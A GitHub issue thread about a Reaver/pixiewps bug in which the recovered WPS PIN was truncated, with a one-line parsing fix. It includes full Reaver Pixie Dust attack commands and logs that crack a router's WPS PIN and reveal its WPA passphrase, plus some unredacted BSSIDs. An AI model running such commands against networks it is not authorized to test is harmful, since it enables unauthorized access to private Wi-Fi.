t6x/reaver-wps-fork-t6x #11: Reaver not passing pin from pixiewps correctly

Extradry31, 2015-05-01:
Hi
Pixiewps v 1.1
Reaverwps fork 1.52

Previous versions working fine

(sorry for long pastes)
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv -c 1 -K 1
Switching mon0 to channel 1
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: eb:0a:11:cf:fc:3c:03:3f:64:cf:df:d9:c5:a6:17:05
[P] PKE: 55:50:40:f2:9e:7f:9a:e1:d9:b3:c7:f9:c5:bc:21:06:d7:cc:04:3c:a2:38:f5:14:5b:3b:e8:59:4d:9b:f9:36:38:45:ff:d0:95:77:bd:94:c3:db:c3:81:e4:b9:47:9c:6f:12:77:0a:32:05:ee:68:e6:8f:70:da:e3:36:5d:13:69:6c:cd:bf:15:5f:23:96:2e:ea:f9:91:c7:8b:b9:2c:34:6b:18:da:18:d0:10:70:81:ef:e0:e4:26:41:ad:52:52:7b:de:43:74:14:ca:2f:c9:9c:e8:9f:bd:49:c5:0f:f9:dc:7e:11:29:0d:64:49:31:5a:3f:73:78:f6:7b:c5:07:de:b3:fd:68:74:25:77:dd:f7:bc:e7:e1:55:3d:33:a6:05:84:4a:de:79:1c:b8:58:50:f0:58:16:6f:85:fb:22:1c:4f:ae:ae:0b:fe:c3:9b:0a:2c:09:81:68:43:ed:3d:b7:6a:6d:47:02:45:52:2d:7f:dd:04:e4:95:d7:27
[P] WPS Manufacturer: http://www.billion.com.au
[P] WPS Model Name: BiPAC 7800N
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: f0:da:6e:ef:c7:26:64:6e:0e:ab:e5:c3:24:a1:62:c6
[P] PKR: 34:df:c4:58:55:2c:a1:08:18:6f:de:f6:04:a0:e1:18:2a:92:16:01:17:36:28:ae:99:54:4e:84:1c:18:25:b5:19:fd:ef:5d:1d:98:ab:66:c7:5b:14:7f:fd:11:3a:eb:b6:b8:a5:51:de:50:66:25:25:c9:85:02:9d:de:71:60:ee:74:53:d2:cf:27:97:66:0c:f9:d1:d8:cc:5a:4b:a4:af:6f:40:fb:9a:95:26:de:97:db:a9:73:b1:09:0e:ec:16:60:4b:5b:e4:7c:aa:6c:ac:4c:c8:41:b7:e2:f7:bf:87:73:46:de:cc:21:00:8b:a4:a6:bc:07:67:57:71:0a:e0:08:41:ef:27:e8:71:6e:d2:59:2c:5c:ba:cc:40:f2:98:72:92:e8:dc:45:29:b3:90:1e:dd:f3:e4:38:66:56:b1:f4:51:ea:1e:90:3b:58:f8:d4:03:c6:b2:e3:d8:58:58:1b:a3:b7:74:78:0a:6d:8f:d4:fd:59:49:1d:e7:fd
[P] AuthKey: 58:51:65:6b:b8:75:ea:3c:19:fe:6f:24:05:7b:5f:21:c0:68:ec:0f:99:49:98:e5:bf:c0:4d:3e:46:ba:bb:25
[+] Sending M2 message
[P] E-Hash1: 22:10:32:25:c1:ff:ca:16:de:c0:5c:14:c5:0b:55:d6:d7:c1:95:fc:cf:1b:dc:70:74:27:56:b1:ec:a1:2b:01
[P] E-Hash2: 6b:3c:ae:51:ff:58:f5:8a:bc:86:27:fa:90:40:7e:19:00:19:e3:48:b9:f7:b1:d1:b9:01:41:ae:11:db:85:37
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [*] E-S1:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] E-S2:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [+] WPS pin:    48606684
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]  
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c 1 -s y -vv -p    48606 **(only passing half of pin)**

[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 1\

Then locks router as too many pin tries

**manual pin entry (working fine)**
 reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -s y -vv -p 48606684

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching mon0 to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXXXX)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 48606684.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 40:72:55:69:28:f8:c0:f2:1b:ce:16:ef:34:b9:da:4b
[P] PKE: 8d:a9:18:ec:2c:2b:71:57:fd:75:d1:e8:89:92:09:d4:d5:5f:45:84:61:6c:de:09:9b:8e:66:7b:ae:f9:d4:14:61:b9:6a:da:18:9f:b2:d7:49:e8:97:8b:a5:d6:0f:a6:13:b9:39:f3:09:8a:23:82:8d:51:81:7a:71:37:57:f8:b9:0b:48:bc:a1:0e:87:7a:b2:2f:07:58:f1:ad:cc:d0:11:65:b7:ab:a8:ae:21:21:aa:81:c9:9b:70:84:cd:95:6a:40:fe:04:94:15:82:aa:6d:ca:3c:86:76:bc:03:53:b3:77:04:26:a3:1b:3c:6c:9d:16:32:c2:60:31:eb:8c:82:a7:74:66:95:6c:58:e0:b3:b2:dd:a0:70:f7:ae:8e:62:17:f8:a7:64:b5:fd:f4:ba:0d:f8:c0:18:42:7e:5a:78:95:93:d7:1a:e7:79:97:6f:47:99:38:87:8f:79:6e:f9:e3:f1:4e:ba:5a:ec:32:25:ee:c7:a7:6a:71:75:56
[P] WPS Manufacturer: http://www.billion.com.au
[P] WPS Model Name: BiPAC 7800N
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: 49:ec:d8:d4:c8:3d:45:f1:19:5f:17:72:1c:2b:c2:62
[P] PKR: 9c:e8:5d:0f:72:24:c7:56:37:b7:af:75:6f:48:d2:eb:71:fc:54:1f:bd:43:9d:de:89:69:3f:63:43:ec:52:aa:75:0a:e5:21:d5:df:94:c0:15:54:6f:a9:d0:f6:ee:c7:ef:d4:70:0f:f4:cd:c3:42:b6:62:df:b9:84:88:64:8c:24:80:21:fc:08:f0:f9:ac:6e:ff:aa:36:9c:d4:92:55:55:8b:4a:e8:9f:d1:75:4f:6d:19:8f:e3:54:8f:f8:9c:89:5a:b4:53:12:de:65:f9:d9:bf:7b:2e:d5:2f:15:17:31:d1:9b:12:bc:a6:eb:4a:e6:8e:ed:eb:f9:da:d2:23:a5:93:38:1c:68:e4:61:cd:a1:e8:84:9e:ed:3f:1d:44:95:1e:94:1e:66:c6:5b:e2:2a:81:3b:80:ef:f4:78:05:2c:63:94:e2:1c:c4:d8:26:d7:1a:b3:9f:88:5e:e8:f7:91:14:d7:a8:c8:24:d0:eb:29:7f:d1:5f:20:99:13:63
[P] AuthKey: 76:65:b9:d7:f4:f7:15:67:f5:1a:17:77:98:3e:ac:a9:89:c1:cc:4a:20:4d:15:f9:70:6a:bf:7d:7a:30:90:6b
[+] Sending M2 message
[P] E-Hash1: 40:75:43:72:55:ed:d0:71:a6:69:ac:c0:27:f8:5a:56:f0:47:5e:27:3e:3e:bc:19:6a:54:d6:76:35:df:4c:d3
[P] E-Hash2: aa:3a:b3:0e:5f:fe:e8:fe:93:81:0c:2d:58:a2:49:28:8b:90:9e:96:f3:ad:6e:61:be:9a:fe:7b:eb:f2:df:6b
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 22 seconds
**[+] WPS PIN: '48606684'**
**[+] WPA PSK: 'wpsflawed.'**
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.

nuroo, 2015-05-02:
I also observed half pin

wiire, 2015-05-02:
It's probably due to the fact that I added some spaces when printing the pin in pixiewps so Reaver doesn't parse it correctly (it gets cut).

Extradry31, 2015-05-02:
yes just rolled back and it is working fine (pixiewps 1.0)

offensive-security, 2015-05-02:
The position of the PIN output seems to have changed in 1.1.  Notice how the WPS key is truncated in the reaver command.

[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [*] E-S1:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] E-S2:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [+] WPS pin:    47797086
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 1 s
[Pixie-Dust]  
Running reaver with the correct pin, wait ...
Cmd : reaver -i wlan0mon -b 80:1F:02:48:EE:BC -c 11 -s y -vv -p    47797

To verify this, in wps/wps_registrar.c, change:

strncpy(pixie_pin, aux_pixie_pin+9, 8); 
to 
strncpy(pixie_pin, aux_pixie_pin+12, 8);

And the strncpy gets re-aligned. Not sure this is the best way to get the key though.

wiire, 2015-05-02:
Fixed as suggested above. If you have any more problem let us know.

Extradry31, 2015-05-02:
Fixed
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [*] E-S1:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] E-S2:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [+] WPS pin:    48606684
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]  
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b 00:04:ED:E2:C1:7C -c 1 -s y -vv -p 48606684

Cheers
Extra

closed 2015-05-02 by Extradry31

warbd, 2017-08-06:
https://www.youtube.com/watch?v=leqBKAEqI1Q
see this

kcdtv, 2017-08-06:
No